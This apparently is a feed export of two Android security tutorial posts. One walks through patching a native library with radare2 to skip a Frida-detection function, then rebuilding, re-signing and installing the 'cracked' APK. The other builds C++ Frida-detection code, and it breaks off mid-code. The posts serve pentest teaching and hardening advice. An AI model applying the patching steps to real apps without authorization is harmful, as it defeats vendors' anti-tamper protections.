    // Final integrity check of the stack
    if stack_modified() then
        exit_program()
    end if

    // Security stack check failed
    stack_security_check_fail()

end function



```
&lt;/details&gt;


# Modifying and Repacking the APK for Testing

To bypass the Frida detection in our modified APK, we’ll use a simple but effective technique. When reverse-engineering native libraries, we often have several options for modifying the flow of the code. For instance, we could locate conditional jumps that trigger `exit()` calls and modify them, or try to change the direction of code execution at key points. However, a reliable and straightforward approach—one that works in many cases—is to jump directly to the end of the function right at the start. This effectively skips all detection logic, allowing the function to “complete” without actually running its checks.

#### Step 1: Modifying the Function in Radare2

With Radare2 open, navigate to the start of the `detectFridaAndExit` function. Here, we’ll add a jump instruction that goes directly to the return (`ret`) instruction at the end of the function, bypassing all detection logic. This modification allows the app to continue running even if Frida is attached.

![](/content/images/2024/10/image-17.png)

Ret address

In Radare2, use the following command to write an unconditional jump to the return instruction’s address:

```bash
wa jmp 0x60fab

```

![](/content/images/2024/10/image-10.png)

Jumping to the ret address

This command tells Radare2 to add a `jmp` instruction to `0x60fab`, which is where the function naturally returns. As a result, when `detectFridaAndExit` is called, it will skip all Frida detection code and go directly to the end.

#### Step 2: Recompiling the APK with APKTool

After modifying `libnative-lib.so`, we need to recompile the APK with the updated library. Use APKTool to rebuild the APK:

```bash
apktool b testing -o app-cracked.apk

```

Here, `testing` is the directory where we previously decompiled the APK, and `app-cracked.apk` is the name of the rebuilt APK. This command packages the APK with our modified native library, creating an APK file that’s ready for the next steps.

#### Step 3: Aligning, Signing, and Installing the APK

Once the native library has been modified, we need to repackage the APK to include the edited `libnative-lib.so`. This involves re-aligning, signing, and reinstalling the APK.

**Align the APK**:  
First, run `zipalign` to ensure the APK is properly aligned, which is necessary for Android to install it:

```bash
~/Android/Sdk/build-tools/34.0.0/zipalign -p -f 4 ./app-cracked.apk ./app-align.apk

```

**Sign the APK**:  
Use `apksigner` to sign the APK with your keystore. This step authenticates the APK for installation:

```bash
~/Android/Sdk/build-tools/34.0.0/apksigner sign --ks /home/rsgbengi/Desktop/android/testing.jks --out ./myapp-cracked-signed.apk ./app-align.apk

```

**Install the APK**:  
Finally, install the modified APK on your emulator:

```bash
adb install ./myapp-cracked-signed.apk

```

#### Step 4: Testing the Bypass with Frida

To verify that the detection has indeed been bypassed, attach Frida to the app and see if it stays active instead of exiting. Run the following command to spawn the app with Frida:

![](/content/images/2024/10/image-18.png)

Frida working correctly

![](/content/images/2024/10/image-19.png)

Bypassing Frida Detection

If everything worked, Frida should attach to the app without triggering an exit, and you should be able to interact with the app normally. The app will continue running even with Frida attached, confirming that the modified `detectFridaAndExit` function no longer executes its detection logic.

This method—redirecting the start of the function to jump directly to the end—provides a simple yet effective way to bypass security checks within native libraries, and it’s a reliable approach for many similar bypass scenarios.

# Conclusions

This chapter has demonstrated how patching native libraries can be an effective method to bypass security measures embedded within an application’s code. By diving directly into the native library, we not only located and analyzed the Frida detection logic but also modified it to allow Frida to attach without triggering the app&apos;s security response.

Here are the key takeaways:

1.  **Native Code Adds Complexity**: Implementing detection in native code increases the complexity for attackers, but as we’ve seen, it’s still possible to bypass these measures with tools like Radare2 and APKTool.
2.  **Limitations of Basic Obfuscation**: While obfuscation can help hide detection functions, relying on default ProGuard settings may not be sufficient to prevent a determined reverse engineer from finding critical functions. Custom obfuscation and strategic distribution of detection code across multiple activities can offer a more robust defense.
3.  **Direct Patching as a Powerful Technique**: Modifying the execution flow by redirecting jumps or altering return points within the native library proved to be a straightforward and effective way to neutralize security checks. This approach, though powerful, is challenging to implement in apps with more advanced obfuscation and layered defenses.

Understanding these techniques not only broadens our knowledge of Android app security but also highlights the importance of layered, well-implemented security measures. For developers, this serves as a reminder to go beyond default obfuscation and use more advanced techniques if the application’s security demands it. For reverse engineers, this chapter provides valuable tools for navigating and modifying native code, offering insights into how to analyze and neutralize embedded security mechanisms in real-world scenarios.

# Resources

-   APKTool - A Tool for Reverse Engineering Android APK Files. &quot;APKTool.&quot; Available at: https://ibotpeaches.github.io/Apktool/
-   Radare2 - Open-source Reverse Engineering Framework. &quot;Radare2.&quot; Available at: https://rada.re/n/radare2.html
-   Ghidra - Software Reverse Engineering Framework. &quot;NSA Cybersecurity.&quot; Available at: [https://ghidra-sre.org/](https://ghidra-sre.org/)
-   Frida - Dynamic Instrumentation Toolkit. &quot;Frida.&quot; Available at: [https://frida.re](https://frida.re/)
-   Android ProGuard and R8 Guide. &quot;Android Developers.&quot; Available at: [https://developer.android.com/studio/build/shrink-code](https://developer.android.com/studio/build/shrink-code)
-   \[INSTALL\_FAILED\_INVALID\_APK: Failed to extract native libraries, res=-2\] after Compile. &quot;GitHub - Apktool Issue #1626.&quot; Available at: [https://github.com/iBotPeaches/Apktool/issues/1626](https://github.com/iBotPeaches/Apktool/issues/1626)
-   Ghidra Decompiler Plugin for Radare2. &quot;r2ghidra-dec GitHub Repository.&quot; Available at: [https://github.com/radareorg/r2ghidra-dec](https://github.com/radareorg/r2ghidra-dec)
-   Jadx - Dex to Java Decompiler. &quot;Jadx GitHub Repository.&quot; Available at: [https://github.com/skylot/jadx](https://github.com/skylot/jadx)</content:encoded><author>Ruben Santos</author></item><item><title>Enhancing Android Security with Native Libraries: Implementation and Evasion Techniques</title><link>https://www.kayssel.com/post/android-9</link><guid isPermaLink="true">https://www.kayssel.com/post/android-9</guid><description>Native libraries in Android boost security by adding low-level defenses, making bypass attempts harder. Still, tools like Frida can evade these measures. The next chapter will cover advanced techniques, including reverse engineering, to overcome tougher security setups</description><pubDate>Sun, 13 Oct 2024 10:57:50 GMT</pubDate><content:encoded># Leveraging Native Libraries for Enhanced Security in Android Applications

Native libraries in Android are compiled pieces of code, typically written in languages like C or C++, that an app can use to perform specific tasks more efficiently or securely than in Java or Kotlin. These libraries are compiled for various architectures (such as ARM or x86) and are included within the APK of the app. They allow direct access to system-level resources and hardware, making them ideal for performance-intensive tasks like gaming, audio, or graphics processing.

In the context of application security, native libraries can also serve as a defense mechanism against certain advanced attacks. For example, tools like Frida, which are used to manipulate the runtime of an Android app, often target the app&apos;s Java layer. By implementing security checks within native libraries, developers can make it much harder for such tools to modify or analyze their app.

Native libraries can also help enhance the security of other mechanisms, such as SSL pinning or anti-root checks, by making it more difficult for attackers to bypass these defenses. Since native code operates closer to the system level and outside the managed runtime environment, it becomes more challenging to hook into or manipulate, providing stronger protection against tampering and reverse-engineering. This makes native libraries an essential part of an app’s security strategy, particularly for sensitive operations that require higher levels of protection.

In this chapter, we&apos;ll explore how to configure and create code in native libraries, as well as their use in Android code and how they can be easily bypassed using Frida. In the next chapter, we&apos;ll see how things can get significantly more complex if a developer changes the way the native function is used and implements it differently in their code.

# Installing the NDK and CMake in Android Studio

To start using native libraries in your Android project, you first need to install the Android NDK and CMake. Follow these steps to set them up:

#### 1\. **Install the Android NDK and CMake**

1.  Open **Android Studio** and go to **File** &gt; **Settings** (on macOS, it&apos;s **Android Studio** &gt; **Preferences**).
2.  In the left-hand menu, navigate to **Appearance &amp; Behavior** &gt; **System Settings** &gt; **Android SDK**.
3.  In the **SDK Tools** tab, scroll through the list and check the following boxes:
    -   **NDK (Side by Side)**
    -   **CMake**
4.  Click **Apply** and then **OK** to install both tools.

![](/content/images/2024/09/image-18.png)

Installing NDK and CMake

### Creating the Necessary Files and Folders for Native Code

Once you have the NDK and CMake installed, the next step is to set up the required folders and files to start using native code in your Android project.

#### 1\. **Create the `cpp` Folder**

You will need to create a new folder inside your project to store the native code:

1.  In Android Studio, navigate to the **Project** view on the left panel.
2.  Right-click on the `src/main` directory, and select **New** &gt; **Directory**.
3.  Name the new folder `cpp`. This folder will contain all your native C++ source files.

#### 2\. **Create a `.cpp` File**

Now, create a C++ source file inside the `cpp` folder:

1.  Right-click on the newly created `cpp` folder, select **New** &gt; **C/C++ Source File**.
2.  Name the file, for example, `native-lib.cpp`.
3.  Inside this file, you can write a simple native function:

```cpp

#include &lt;jni.h&gt;
#include &lt;string&gt;
#include &lt;jni.h&gt;
#include &lt;string&gt;
#include &lt;dirent.h&gt;  // To scan directories
#include &lt;unistd.h&gt;  // For access function
#include &lt;fstream&gt;   // To check for Frida processes
#include &lt;sys/types.h&gt;
#include &lt;sys/stat.h&gt;

extern &quot;C&quot; JNIEXPORT jstring JNICALL
Java_com_example_localauth_MainActivity_stringFromJNI(
        JNIEnv* env,
        jobject /* this */) {
    std::string hello = &quot;Hello from C++&quot;;
    return env-&gt;NewStringUTF(hello.c_str());
}

```

This will serve as a simple test function to ensure your native code is set up correctly.

#### 3\. **Create the `CMakeLists.txt` File**

To compile the native code, you need a `CMakeLists.txt` file:

1.  Right-click on the `cpp` folder, select **New** &gt; **File**.
2.  Name it `CMakeLists.txt` and add the following content:

```cpp
# Set the minimum required version of CMake
cmake_minimum_required(VERSION 3.4.1)

# Add the shared library, which will be named &apos;native-lib&apos; and will be compiled from the file native-lib.cpp
add_library(
        native-lib        # Name of the library
        SHARED            # Specifies that it is a shared library
        native-lib.cpp    # Source file
)

# Find the log library, which is required for Android

find_library(
        log-lib           # Name of the variable where the library path will be stored
        log               # Name of the system library to search for
)

# Link the native library with the found libraries (in this case log-lib)
target_link_libraries(
        native-lib        # Native library we are linking
        ${log-lib}        # Link the system library (log)
)

```

This configuration file tells CMake how to compile the `native-lib.cpp` file and links it to the required libraries.

#### 4\. **Folder Structure Overview**

After these steps, your folder structure should look like this:

![](/content/images/2024/10/image.png)

Folder structure overview

# Updating the `build.gradle.kts` File for Native Code

Now that we have created the necessary folders and files, you need to update your `build.gradle.kts` file to properly integrate the native code into the Android project. You already have a well-structured `build.gradle.kts` file, but let&apos;s add or modify the relevant sections to ensure your C++ files and CMake are properly linked.

Here’s what you need to check and modify:

#### 1\. **Add NDK and CMake Configuration**

In your existing `build.gradle` file, you already have the necessary configurations, but ensure the following settings are properly applied:

-   **`externalNativeBuild` block:** This block configures the native build system (in this case, CMake). You have this correctly set up, but here is a confirmation of what needs to be included:

```kotlin
externalNativeBuild {
    cmake {
        cppFlags.add(&quot;-std=c++11&quot;) // Ensure you have the proper C++ version
    }
}

```

**`ndk` block:** You already specify the ABIs (Application Binary Interfaces) for the native code, which is necessary to compile for different architectures. Here’s how it should look:

```kotlin
ndk {
    abiFilters.addAll(listOf(&quot;armeabi-v7a&quot;, &quot;arm64-v8a&quot;, &quot;x86&quot;, &quot;x86_64&quot;))  // Add supported ABIs
}

```

#### 2\. **Include the CMake Path**

The `CMakeLists.txt` file you created needs to be referenced in your `build.gradle`. You’ve already correctly added this section, but here’s a recap for clarity:

```kotlin
externalNativeBuild {
    cmake {
        path = file(&quot;src/main/cpp/CMakeLists.txt&quot;) // Path to your CMakeLists file
    }
}

```

This line ensures that Gradle knows where to find your native code build script.

#### 3\. **Check the NDK Version**

It’s good practice to specify the NDK version explicitly in your `build.gradle`. You already have this in place, but ensure it is correctly specified:

```kotlin
ndkVersion = &quot;27.1.12297006&quot;

```

#### 4\. **Overall `build.gradle.kts` Configuration Example**

Here’s an example of your `build.gradle.kts` file, which already includes all the necessary settings:

&lt;details&gt;
&lt;summary&gt;Build.gradle.kts code&lt;/summary&gt;

```kotlin
plugins {
    alias(libs.plugins.android.application)
    alias(libs.plugins.jetbrains.kotlin.android)
}

android {
    namespace = &quot;com.example.localauth&quot;
    compileSdk = 34

    defaultConfig {
        applicationId = &quot;com.example.localauth&quot;
        minSdk = 24
        targetSdk = 34
        versionCode = 1
        versionName = &quot;1.0&quot;

        testInstrumentationRunner = &quot;androidx.test.runner.AndroidJUnitRunner&quot;
        vectorDrawables {
            useSupportLibrary = true
        }

        externalNativeBuild {
            cmake {
                cppFlags.add(&quot;-std=c++11&quot;)  // Set C++ version
            }
        }

        ndk {
            abiFilters.addAll(listOf(&quot;armeabi-v7a&quot;, &quot;arm64-v8a&quot;, &quot;x86&quot;, &quot;x86_64&quot;))  // Add supported ABIs
        }
    }

    externalNativeBuild {
        cmake {
            path = file(&quot;src/main/cpp/CMakeLists.txt&quot;)  // Path to CMakeLists.txt
        }
    }

    buildTypes {
        release {
            isMinifyEnabled = false
            proguardFiles(
                getDefaultProguardFile(&quot;proguard-android-optimize.txt&quot;),
                &quot;proguard-rules.pro&quot;
            )
        }
    }

    compileOptions {
        sourceCompatibility = JavaVersion.VERSION_1_8
        targetCompatibility = JavaVersion.VERSION_1_8
    }

    kotlinOptions {
        jvmTarget = &quot;1.8&quot;
    }

    buildFeatures {
        compose = true
    }

    composeOptions {
        kotlinCompilerExtensionVersion = &quot;1.5.1&quot;
    }

    packaging {
        resources {
            excludes += &quot;/META-INF/{AL2.0,LGPL2.1}&quot;
        }
    }

    ndkVersion = &quot;27.1.12297006&quot;
}

dependencies {
    implementation(libs.androidx.core.ktx)
    implementation(libs.androidx.lifecycle.runtime.ktx)
    implementation(libs.androidx.activity.compose)
    implementation(&quot;androidx.biometric:biometric:1.2.0-alpha05&quot;)
    implementation(platform(libs.androidx.compose.bom))
    implementation(libs.androidx.ui)
    implementation(libs.androidx.ui.graphics)
    implementation(libs.androidx.ui.tooling.preview)
    implementation(libs.androidx.material3)
    implementation(libs.androidx.appcompat)
    implementation(libs.material)
    implementation(libs.androidx.activity)
    implementation(libs.androidx.constraintlayout)
    testImplementation(libs.junit)
    androidTestImplementation(libs.androidx.junit)
    androidTestImplementation(libs.androidx.espresso.core)
    androidTestImplementation(platform(libs.androidx.compose.bom))
    androidTestImplementation(libs.androidx.ui.test.junit4)
    debugImplementation(libs.androidx.ui.tooling)
    debugImplementation(libs.androidx.ui.test.manifest)
}

```
&lt;/details&gt;


# Adding and Calling the Native Function in Your Application

Now that you have set up the native library, the next step is to call the native function from your Kotlin (or Java) code. Here’s how you can add the necessary code to connect the native C++ function to your Android application.

#### 1\. **Load the Native Library**

The first thing you need to do is load the native library into your Android app. This can be done using the `System.loadLibrary()` method in your `MainActivity.kt` (or any other activity where you want to use the native code).

In your `MainActivity.kt`, add the following code:

```kotlin
class MainActivity : AppCompatActivity() {

    private lateinit var cipher: Cipher
    private lateinit var keyStore: KeyStore
    private val keyAlias = &quot;test&quot;
    val expectedData = &quot;PASSWORD&quot;.toByteArray()

    companion object {
        init {
            System.loadLibrary(&quot;native-lib&quot;) 
        }
    }
...

```

#### 2\. **Declare the Native Function**

The `external` keyword is used to declare the native function in Kotlin (or Java). This tells Android that the implementation of this function is in native code, which will be loaded from the `native-lib.cpp` file.

```kotlin
// Declare the native function
external fun stringFromJNI(): String

```

#### 3\. **Call the Native Function in Your UI**

After loading the native library and declaring the native method, you can call the `stringFromJNI()` function just like any other Kotlin (or Java) function.

```kotlin
class MainActivity : AppCompatActivity() {

    private lateinit var cipher: Cipher
    private lateinit var keyStore: KeyStore
    private val keyAlias = &quot;test&quot;
    val expectedData = &quot;PASSWORD&quot;.toByteArray()

    companion object {
        init {
            System.loadLibrary(&quot;native-lib&quot;) 
        }
    }
    external fun stringFromJNI(): String

    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        setContentView(R.layout.activity_main)
        val messageFromNative = stringFromJNI()
        Log.d(&quot;JNI&quot;, &quot;Mensaje desde C++: $messageFromNative&quot;)

```

#### 4\. **Testing the Application**

Once you have added the code above, you can run your application to ensure everything is working. If set up correctly, the native function `stringFromJNI()` should return a string from the C++ code and display it in logcat.

![](/content/images/2024/09/image-20.png)

Working example

&lt;details&gt;
&lt;summary&gt;MainActivity&lt;/summary&gt;

```kotlin
package com.example.localauth

import android.content.Intent
import android.os.Bundle
import android.util.Base64
import android.widget.Button
import android.widget.Toast
import androidx.appcompat.app.AppCompatActivity
import androidx.biometric.BiometricPrompt
import androidx.core.content.ContextCompat
import java.security.KeyStore
import javax.crypto.Cipher
import javax.crypto.KeyGenerator
import javax.crypto.SecretKey
import android.security.keystore.KeyGenParameterSpec
import android.security.keystore.KeyProperties
import android.util.Log
import javax.crypto.spec.GCMParameterSpec

class MainActivity : AppCompatActivity() {

    private lateinit var cipher: Cipher
    private lateinit var keyStore: KeyStore
    private val keyAlias = &quot;test&quot;
    val expectedData = &quot;PASSWORD&quot;.toByteArray()

    companion object {
        init {
            System.loadLibrary(&quot;native-lib&quot;) // sin &quot;lib&quot; y sin &quot;.so&quot;
        }
    }
    external fun stringFromJNI(): String

    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        setContentView(R.layout.activity_main)
        val messageFromNative = stringFromJNI()
        Log.d(&quot;JNI&quot;, &quot;Mensaje desde C++: $messageFromNative&quot;)

        createKey()

        val btnEncrypt: Button = findViewById(R.id.btn_encrypt)
        btnEncrypt.setOnClickListener {
            showBiometricPromptForEncryption(&quot;PASSWORD&quot;)
        }

        val btnReset: Button = findViewById(R.id.btn_reset)
        btnReset.setOnClickListener {
            resetEncryptedData()
        }

        val btnAuthenticate: Button = findViewById(R.id.btn_authenticate)
        btnAuthenticate.setOnClickListener {
            showBiometricPrompt()
        }
    }


    // Create Key in Keystore
    private fun createKey() {
        val keyGenerator = KeyGenerator.getInstance(KeyProperties.KEY_ALGORITHM_AES, &quot;AndroidKeyStore&quot;)
        val keyGenParameterSpec = KeyGenParameterSpec.Builder(
            keyAlias,
            KeyProperties.PURPOSE_ENCRYPT or KeyProperties.PURPOSE_DECRYPT
        ).setBlockModes(KeyProperties.BLOCK_MODE_GCM)
            .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_NONE)
            .setUserAuthenticationRequired(true)
            .setInvalidatedByBiometricEnrollment(true)
            .setUserAuthenticationValidityDurationSeconds(-1)  // Require biometric every time
            .build()

        keyGenerator.init(keyGenParameterSpec)
        keyGenerator.generateKey()
    }

    // Initialize the cipher for encryption/decryption
    private fun initCipher(mode: Int, iv: ByteArray? = null): Boolean {
        return try {
            keyStore = KeyStore.getInstance(&quot;AndroidKeyStore&quot;)
            keyStore.load(null)

            val key = keyStore.getKey(keyAlias, null) as SecretKey
            cipher = Cipher.getInstance(&quot;${KeyProperties.KEY_ALGORITHM_AES}/${KeyProperties.BLOCK_MODE_GCM}/${KeyProperties.ENCRYPTION_PADDING_NONE}&quot;)

            if (mode == Cipher.ENCRYPT_MODE) {
                cipher.init(Cipher.ENCRYPT_MODE, key)  // Generate new IV
            } else if (mode == Cipher.DECRYPT_MODE &amp;&amp; iv != null) {
                val gcmSpec = GCMParameterSpec(128, iv)
                cipher.init(Cipher.DECRYPT_MODE, key, gcmSpec)  // Use provided IV
            }
            true
        } catch (e: Exception) {
            e.printStackTrace()
            false
        }
    }

    // Show biometric prompt and tie it to the cipher object
    private fun showBiometricPrompt() {
        val executor = ContextCompat.getMainExecutor(this)
        val biometricPrompt = BiometricPrompt(this, executor, object : BiometricPrompt.AuthenticationCallback() {
            override fun onAuthenticationSucceeded(result: BiometricPrompt.AuthenticationResult) {
                super.onAuthenticationSucceeded(result)
                val cryptoObject = result.cryptoObject
                if (cryptoObject != null &amp;&amp; cryptoObject.cipher != null) {
                    try {
                        val decryptedData = decryptData(cryptoObject)
                        if (decryptedData == null || !isValidData(decryptedData)) {
                            Toast.makeText(this@MainActivity, &quot;Decryption failed or invalid data!&quot;, Toast.LENGTH_SHORT).show()
                        } else {
                            showSuccess()
                        }
                    } catch (e: Exception) {
                        e.printStackTrace()
                        Toast.makeText(this@MainActivity, &quot;Decryption error!&quot;, Toast.LENGTH_SHORT).show()
                    }
                } else {
                    Toast.makeText(this@MainActivity, &quot;Authentication succeeded but CryptoObject is missing!&quot;, Toast.LENGTH_SHORT).show()
                }
            }
            override fun onAuthenticationFailed() {
                super.onAuthenticationFailed()
                Toast.makeText(this@MainActivity, &quot;Authentication failed&quot;, Toast.LENGTH_SHORT).show()
            }
        })

        if (initCipher(Cipher.DECRYPT_MODE, retrieveStoredIV())) {
            val cryptoObject = BiometricPrompt.CryptoObject(cipher)
            val promptInfo = BiometricPrompt.PromptInfo.Builder()
                .setTitle(&quot;Biometric Authentication&quot;)
                .setSubtitle(&quot;Log in using your fingerprint&quot;)
                .setNegativeButtonText(&quot;Use password&quot;)
                .build()

            biometricPrompt.authenticate(promptInfo, cryptoObject)
        }
    }

    // Updated: Fixing how cipher is used after biometric authentication completes
    private fun showBiometricPromptForEncryption(plainText: String) {
        val executor = ContextCompat.getMainExecutor(this)
        val biometricPrompt = BiometricPrompt(this, executor, object : BiometricPrompt.AuthenticationCallback() {
            override fun onAuthenticationSucceeded(result: BiometricPrompt.AuthenticationResult) {
                super.onAuthenticationSucceeded(result)
                val cryptoObject = result.cryptoObject
                if (cryptoObject != null) {
                    try {
                        // Encrypt after biometric authentication
                        val encryptedData = cryptoObject.cipher?.doFinal(plainText.toByteArray())
                        if (encryptedData != null) {
                            val iv = cryptoObject.cipher?.iv  // Get the generated IV
                            storeEncryptedDataAndIV(Base64.encodeToString(encryptedData, Base64.DEFAULT), iv!!)
                            Toast.makeText(this@MainActivity, &quot;Encryption successful!&quot;, Toast.LENGTH_SHORT).show()
                        }
                    } catch (e: Exception) {
                        e.printStackTrace()
                        Toast.makeText(this@MainActivity, &quot;Encryption error!&quot;, Toast.LENGTH_SHORT).show()
                    }
                }
            }

            override fun onAuthenticationFailed() {
                super.onAuthenticationFailed()
                Toast.makeText(this@MainActivity, &quot;Authentication failed&quot;, Toast.LENGTH_SHORT).show()
            }
        })

        if (initCipher(Cipher.ENCRYPT_MODE)) {
            val cryptoObject = BiometricPrompt.CryptoObject(cipher)
            val promptInfo = BiometricPrompt.PromptInfo.Builder()
                .setTitle(&quot;Biometric Authentication for Encryption&quot;)
                .setSubtitle(&quot;Use your fingerprint to encrypt data&quot;)
                .setNegativeButtonText(&quot;Use password&quot;)
                .build()

            biometricPrompt.authenticate(promptInfo, cryptoObject)
        }
    }

    // Check if decrypted data is valid
    private fun isValidData(decryptedData: ByteArray): Boolean {
        return decryptedData.contentEquals(expectedData)  // Example validation
    }

    // Decrypt data using the CryptoObject
    private fun decryptData(cryptoObject: BiometricPrompt.CryptoObject): ByteArray? {
        return try {
            val encryptedData = Base64.decode(retrieveEncryptedData(), Base64.DEFAULT)
            val iv = retrieveStoredIV()  // Retrieve the stored IV
            if (initCipher(Cipher.DECRYPT_MODE, iv)) {  // Use the retrieved IV
                val decryptedData = cryptoObject.cipher?.doFinal(encryptedData)
                decryptedData
            } else {
                null
            }
        } catch (e: Exception) {
            e.printStackTrace()
            null
        }
    }

    private fun encryptAndStoreData(plainText: String) {
        if (initCipher(Cipher.ENCRYPT_MODE)) {
            try {
                val encryptedData = cipher.doFinal(plainText.toByteArray())
                val iv = cipher.iv  // Get the generated IV
                storeEncryptedDataAndIV(Base64.encodeToString(encryptedData, Base64.DEFAULT), iv)
            } catch (e: Exception) {
                e.printStackTrace()
                Toast.makeText(this, &quot;Encryption failed&quot;, Toast.LENGTH_SHORT).show()
            }
        }
    }

    // Simulate storing encrypted data and IV (replace with actual storage logic)
    private fun storeEncryptedDataAndIV(encryptedData: String, iv: ByteArray) {
        val sharedPreferences = getSharedPreferences(&quot;biometric_prefs&quot;, MODE_PRIVATE)
        val editor = sharedPreferences.edit()
        editor.putString(&quot;encrypted_data&quot;, encryptedData)
        editor.putString(&quot;iv&quot;, Base64.encodeToString(iv, Base64.DEFAULT))  // Store the IV as Base64 string
        editor.apply()
    }

    // Retrieve encrypted data and IV
    private fun retrieveEncryptedData(): String {
        val sharedPreferences = getSharedPreferences(&quot;biometric_prefs&quot;, MODE_PRIVATE)
        return sharedPreferences.getString(&quot;encrypted_data&quot;, &quot;&quot;) ?: &quot;&quot;
    }

    private fun retrieveStoredIV(): ByteArray {
        val sharedPreferences = getSharedPreferences(&quot;biometric_prefs&quot;, MODE_PRIVATE)
        val ivString = sharedPreferences.getString(&quot;iv&quot;, null)
        return Base64.decode(ivString, Base64.DEFAULT)
    }

    private fun showSuccess() {
        Toast.makeText(this, &quot;Authentication successful!&quot;, Toast.LENGTH_SHORT).show()
        val intent = Intent(this, SuccessActivity::class.java)
        startActivity(intent)
        finish()  // Optionally finish MainActivity to prevent going back without re-authentication
    }
    private fun resetEncryptedData() {
        val sharedPreferences = getSharedPreferences(&quot;biometric_prefs&quot;, MODE_PRIVATE)
        val editor = sharedPreferences.edit()
        editor.remove(&quot;encrypted_data&quot;)  // Remove encrypted data
        editor.remove(&quot;iv&quot;)  // Remove IV
        editor.apply()
        Log.d(&quot;Reset&quot;, &quot;Encrypted data and IV reset.&quot;)
        Toast.makeText(this, &quot;Encrypted data reset.&quot;, Toast.LENGTH_SHORT).show()
    }
}

```
&lt;/details&gt;


# Implementing Frida Detection with a Native Library

Now that we&apos;ve covered how native libraries can be used for security measures like Frida detection, let&apos;s look at a typical implementation developers often use to detect Frida in an Android app with native code. The following example shows a native function that performs common checks to identify suspicious libraries, processes, and network activity associated with Frida.

&lt;details&gt;
&lt;summary&gt;Native Code for Detecting Frida&lt;/summary&gt;

```cpp
#include &lt;jni.h&gt;
#include &lt;string&gt;
#include &lt;jni.h&gt;
#include &lt;string&gt;
#include &lt;dirent.h&gt;  // To scan directories
#include &lt;unistd.h&gt;  // For access function
#include &lt;fstream&gt;   // To check for Frida processes
#include &lt;sys/types.h&gt;
#include &lt;sys/stat.h&gt;

extern &quot;C&quot; JNIEXPORT jstring JNICALL
Java_com_example_localauth_MainActivity_stringFromJNI(
        JNIEnv* env,
        jobject /* this */) {
    std::string hello = &quot;Hello from C++&quot;;
    return env-&gt;NewStringUTF(hello.c_str());
}

extern &quot;C&quot;
JNIEXPORT jboolean JNICALL
Java_com_example_localauth_MainActivity_detectFrida(
        JNIEnv* env,
        jobject /* this */) {

    // 1. Check for Frida-related libraries in the process
    const char* suspiciousLibs[] = {
            &quot;frida-agent&quot;,
            &quot;frida-gadget&quot;,
            &quot;libfrida-gadget.so&quot;
    };

    for (const char* lib : suspiciousLibs) {
        // Check if the Frida library is loaded
        if (access(lib, F_OK) != -1) {
            return JNI_TRUE;  // Frida detected
        }
    }

    // 2. Check for Frida processes
    std::ifstream procList(&quot;/proc/self/maps&quot;);
    std::string line;
    while (std::getline(procList, line)) {
        if (line.find(&quot;frida&quot;) != std::string::npos) {
            return JNI_TRUE;  // Frida detected
        }
    }

    // 3. Check if Frida server is running on common ports
    std::ifstream netstat(&quot;/proc/net/tcp&quot;);
    while (std::getline(netstat, line)) {
        if (line.find(&quot;127.0.0.1:27042&quot;) != std::string::npos ||  // Default Frida port
            line.find(&quot;127.0.0.1:27043&quot;) != std::string::npos) {  // Alternative Frida port
            return JNI_TRUE;  // Frida detected
        }
    }

    // If no detection was successful
    return JNI_FALSE;
}


```
&lt;/details&gt;


The `detectFrida()` function performs several checks to detect if Frida is being used on the device:

1.  **Checking for Suspicious Libraries**: Frida often loads specific libraries like `frida-agent` or `libfrida-gadget.so`. The function checks if any of these libraries are present by scanning the process memory and filesystem. If found, it immediately returns `JNI_TRUE`, indicating Frida’s presence.
2.  **Scanning for Frida Processes**: The function reads the `/proc/self/maps` file, which contains details of the memory mappings for the current process. If the string &quot;frida&quot; is found, it indicates that a Frida-related process is running.
3.  **Checking Network Ports**: Frida typically uses specific TCP ports (such as `27042` and `27043`) to communicate with its server. The function checks the `/proc/net/tcp` file, which lists all open TCP connections, for any indication that Frida is running on these ports.

If any of these checks succeed, the function returns `JNI_TRUE`, signaling that Frida is detected. Otherwise, it returns `JNI_FALSE`.

### How to Use the `detectFrida()` Function in Kotlin

After implementing the native function in C++, the next step is to call it from your Kotlin (or Java) code to utilize the Frida detection mechanism.

#### 1\. **Declare the Native Function**

In your `MainActivity.kt`, declare the `detectFrida()` function using the `external` keyword:

```kotlin
external fun detectFrida(): Boolean

```

#### 2\. **Call the Frida Detection Function**

You can now call the `detectFrida()` function at any point in your app to check if Frida is present:

```kotlin
if (detectFrida()) {
        Log.d(&quot;Security&quot;, &quot;Frida detected!&quot;)
        showFridaDetectedDialog()
    } else {
        Log.d(&quot;Security&quot;, &quot;No Frida detected.&quot;)
    }

```

![](/content/images/2024/10/image-3.png)

Detection of frida

&lt;details&gt;
&lt;summary&gt;MainActivity&lt;/summary&gt;

```kotlin
package com.example.localauth

import android.content.Intent
import android.app.AlertDialog
import android.content.DialogInterface
import android.os.Bundle
import android.util.Base64
import android.widget.Button
import android.widget.Toast
import androidx.appcompat.app.AppCompatActivity
import androidx.biometric.BiometricPrompt
import androidx.core.content.ContextCompat
import java.security.KeyStore
import javax.crypto.Cipher
import javax.crypto.KeyGenerator
import javax.crypto.SecretKey
import android.security.keystore.KeyGenParameterSpec
import android.security.keystore.KeyProperties
import android.util.Log
import javax.crypto.spec.GCMParameterSpec

class MainActivity : AppCompatActivity() {

    private lateinit var cipher: Cipher
    private lateinit var keyStore: KeyStore
    private val keyAlias = &quot;test&quot;
    val expectedData = &quot;PASSWORD&quot;.toByteArray()

    companion object {
        init {
            System.loadLibrary(&quot;native-lib&quot;) // sin &quot;lib&quot; y sin &quot;.so&quot;
        }
    }
    external fun stringFromJNI(): String
    external fun detectFrida(): Boolean

    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        setContentView(R.layout.activity_main)
        val messageFromNative = stringFromJNI()
        Log.d(&quot;JNI&quot;, &quot;Message from C++: $messageFromNative&quot;)

        if (detectFrida()) {
            Log.d(&quot;Security&quot;, &quot;Frida detected!&quot;)
            showFridaDetectedDialog()
        } else {
            Log.d(&quot;Security&quot;, &quot;No Frida detected.&quot;)
        }

        createKey()

        val btnEncrypt: Button = findViewById(R.id.btn_encrypt)
        btnEncrypt.setOnClickListener {
            showBiometricPromptForEncryption(&quot;PASSWORD&quot;)
        }

        val btnReset: Button = findViewById(R.id.btn_reset)
        btnReset.setOnClickListener {
            resetEncryptedData()
        }

        val btnAuthenticate: Button = findViewById(R.id.btn_authenticate)
        btnAuthenticate.setOnClickListener {
            showBiometricPrompt()
        }
    }


    // Create Key in Keystore
    private fun createKey() {
